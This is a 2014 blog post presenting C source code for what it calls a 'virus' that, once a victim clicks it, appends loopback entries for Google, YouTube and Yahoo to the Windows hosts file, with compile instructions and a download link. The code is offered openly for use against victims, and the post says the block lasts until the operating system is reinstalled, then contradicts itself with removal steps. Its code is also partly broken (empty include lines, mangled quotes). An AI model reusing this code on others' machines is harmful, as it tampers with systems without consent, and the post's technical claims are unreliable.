Tuesday, 15 July 2014

Creating a Virus to Block Websites By iSARG Uttam Nagar









 





Most of us are familiar with the virus that used to block Orkut and YouTube site.If you are curious about creating such a virus on your own, then you are in the right place.Today I’ll teach you how to create a simple virus that block’s websites.And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus.I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’.So, anyone with a basic knowledge of C will be able to understand the working of the virus.This virus need’s to be clicked only once by the victim.Once it is clicked, it’ll block a list of websites that has been specified in the source code.The victim will never be able to surf those websites unless he re-install’s the operating system.This blocking is not just confined to IE or Firefox.So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually.But, here I have created a virus that automates all the steps involved in blocking.The manual blocking process is described in the post How to Block a Website ?

Here is the source code of the virus.

#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

1. Download the source code along with the the compiled module(virus) Here.

2. Compile the sourcecode using any C/C++ compiler.

3. To test, run the compiled module. It will block the sites that is listed in the source code.

4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

4. To remove the virus type the following the Run.
%windir%\system32\drivers\etc

5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

6. Delete all such entries which contain the names of blocked sites.

No comments:

Post a Comment